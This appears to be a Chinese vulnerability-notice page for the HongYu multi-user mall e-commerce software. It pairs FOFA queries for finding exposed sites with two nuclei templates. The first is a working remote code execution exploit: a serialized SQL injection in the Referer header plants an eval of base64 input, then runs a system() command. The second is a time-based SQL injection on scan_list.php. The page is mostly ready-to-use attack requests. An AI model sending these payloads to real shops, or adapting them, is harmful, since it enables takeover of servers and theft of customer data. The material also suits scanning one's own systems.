跳到主要内容

鸿宇多用户商城

鸿宇多用户商城user.php存在远程命令执行漏洞

Fofa:body="content=HongYuJD" && body="68ecshopcom_360buy"

image-20240506180020870

image-20240506180307901

id: hydyhsc-user-rce

info:
  name: hydyhsc-user-rce
  author: m0be1
  severity: critical
  description: 鸿宇多用户商城user.php RCE漏洞

http:
  - raw: 
    - |
      POST /user.php HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
      Content-Type: application/x-www-form-urlencoded
      Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:233:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243686959584e6c4e6a52665a47566a6232526c4b435266554539545646747961574e7258536b704f773d3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
      Accept-Encoding: gzip
      Connection: close

      action=login&rick=ZWNobyhzeXN0ZW0oImVjaG8gc3RjdGVzdCIpKTs=

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"stctest")'

image-20240506175911784

鸿宇多用户商城scan_list存在SQL注入漏洞

Fofa:body="content=HongYuJD" && body="68ecshopcom_360buy"

image-20240506180020870

image-20240506180657312

nuclei

id: hydyhsc-scanlist-sqli

info:
  name: hydyhsc-scanlist-sqli
  author: xxx
  severity: critical
  description: 鸿宇多用户商城scan_list存在SQL注入漏洞

http:
  - raw:
    - |
      POST /scan_list.php HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 25

      data['fahuo']=(SELECT 2753 FROM (SELECT(SLEEP(0)))QkUH)&act=view
    - |
      POST /scan_list.php HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 25

      data['fahuo']=(SELECT 2753 FROM (SELECT(SLEEP(3)))QkUH)&act=view

    matchers:
     - type: dsl
       dsl:
         - 'status_code==200 && duration_1>0 && duration_1<1'
         - 'status_code==200 && duration_2>3 && duration_2<4'

image-20240506180528624